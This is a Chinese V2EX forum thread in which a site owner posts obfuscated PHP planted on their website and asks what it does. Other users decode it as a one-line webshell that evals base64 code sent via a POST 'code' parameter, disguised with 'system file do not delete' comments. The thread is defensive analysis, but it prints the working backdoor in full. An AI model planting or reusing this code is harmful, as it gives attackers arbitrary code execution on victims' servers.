网站被植入这样的代码,能翻译下么?想知道他是干嘛的。。

2013-01-29 11:20:29 +08:00
 isy
<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
4120 次点击
所在节点    问与答
13 条回复
mechille
2013-01-29 11:22:28 +08:00
空间商植入的?
isy
2013-01-29 11:25:24 +08:00
@mechille 应该是利用上传漏洞上传的。
clww
2013-01-29 11:29:26 +08:00
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
xavierskip
2013-01-29 11:29:55 +08:00
base64 编码
isy
2013-01-29 11:43:12 +08:00
@clww @xavierskip 后面这段呢?

$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
isy
2013-01-29 11:50:32 +08:00
明白了。。

$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"; 等于 base64_decode
nazor
2013-01-29 11:50:46 +08:00
是比较加密过的一句话。
shinwood
2013-01-29 11:55:39 +08:00
可以执行任意PHP代码的一个Hook。
SuperOS
2013-01-29 11:56:19 +08:00
webshell 服务器端
solo7net
2013-01-29 13:16:28 +08:00
传说中的一句话马?
inroading
2013-01-30 08:28:10 +08:00
一字马
holystrike
2013-01-30 09:28:19 +08:00
服务器上把eval函数禁了
mozutaba
2013-02-03 01:45:30 +08:00
一句话,dangrous没拼错吧

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/59141

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX